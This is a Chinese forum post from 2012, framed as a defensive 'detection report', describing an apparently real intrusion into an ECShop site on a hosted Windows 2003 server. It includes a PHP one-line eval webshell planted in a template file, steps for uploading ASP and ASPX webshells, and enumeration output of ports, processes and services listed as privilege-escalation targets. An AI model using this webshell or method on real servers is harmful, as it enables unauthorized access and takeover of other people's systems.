设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
综合交流
›
网络攻防
›
检测某IDC服务器从入侵提权谈主机防御
返回列表
发新帖
检测某IDC服务器从入侵提权谈主机防御
[复制链接]
1273
|
0
|
2012-4-1 19:25:35
|
显示全部楼层
|
阅读模式
主题:检测某IDC服务器从入侵提权谈主机防御
前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。
目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u
目标网站:Ecshop2.7x
提权:
通常步骤
1、上传aspwebshell检测可用组件,端口,目录。
2、上传aspxwebhsell测试执行命令,获取进程、服务、端口信息
入手
Echop2.7x暴过几个注入,很容易取到后台登录密码。
这个利用方法
百度
都有,不在一一描述。
后台Getshell,也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<?phpeval($_POST['c'])?>
连接http://site/myship.php一句话
信息收集
一、检测权限
1.先phpshell检测服务器上的目录浏览权限,D:/wwwroot/xxx/wwwroot/可以看出是IDC管理网站的做法,独立用户单独权限处理当前用户无法跳转跨目录。
另外,CDEF盘都无浏览权限。因为PHP和ASP继承的是IIS用户的权限,所以都不能列出目录。
2.列出程序目录,
程序目录
360、MicrosoftSQLServer先想到两种提权方法
二、检测目标服务
上传aspshell检测服务器组件
1.wscript.shell×命令行执行组件不支持
2.常用端口
127.0.0.1:1433.........开放
127.0.0.1:3389.........关闭
127.0.0.1:43958.........开放
3.C:\DocumentsandSettings\AllUsers\无权限访问
C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\无权限访问
C:\DocumentsandSettings\AllUsers\Documents\可读取写入
4.查看系统服务-用户账号对象不支持此属性或方法(禁用了Workstation)
5.查看管理员他奶奶的不行啊:Wscript.Network(禁用了Wscript.Network)
上传aspxshell检测服务器可执行命令
1.ASPX继承users组权限,对CDEF盘都无浏览权限。
2.默认调用c:\windows\system32\cmd.exe无权访问。
cmd
3.IISSPY可列IIS用户、密码、域名以及本地路径。
IIS用户
4.Process列出进程,可利用如下
11176hzclient华众主机客户端
121588r_serverRadmin控制服务端
1810660shstatmcafee杀毒
553548SERVUTRAYserv-u服务端
7310892mysqldmysql数据库
5.Services列出服务,可利用如下
291176HZCLIENTD:\hzhost\hzclient.exe
721588r_server"C:\WINDOWS\system32\r_server.exe"/service
411312McShield"C:\ProgramFiles\McAfee\VirusScanEnterprise\Mcshield.exe"
5010892MySQL51"E:\ProgramFiles\MySQL\MySQLServer5.1\bin\mysqld"--defaults-file="E:\ProgramFiles\MySQL\MySQLServer5.1\my.ini"MySQL51
795708Serv-UE:\programfiles\Serv-U\ServUDaemon.exe
检测
,
服务器
,
百度
,
主题
,
程序
相关帖子
•
有开区版本的,一起合作开区, 让你绝对有赚无亏!
•
2012-05-26最新更新GM2引擎,完全兼容herom2引擎。
•
关于开F遇到的各种问题
•
服务--2网站--版本---一起换让
•
为什么我的服务器只能带4个区
•
开传奇版本是怎么赚钱的
•
本人免费提供服务器,有高手GM想开单机传奇的进来交谈!
•
关于使用GeeM2引擎的传奇服务端必读说明
•
GeeM2引擎传奇服务端远程服务器使用说明
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
飞尔
回复楼主
返回列表
茶余饭后
网络攻防
旧帖回收
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)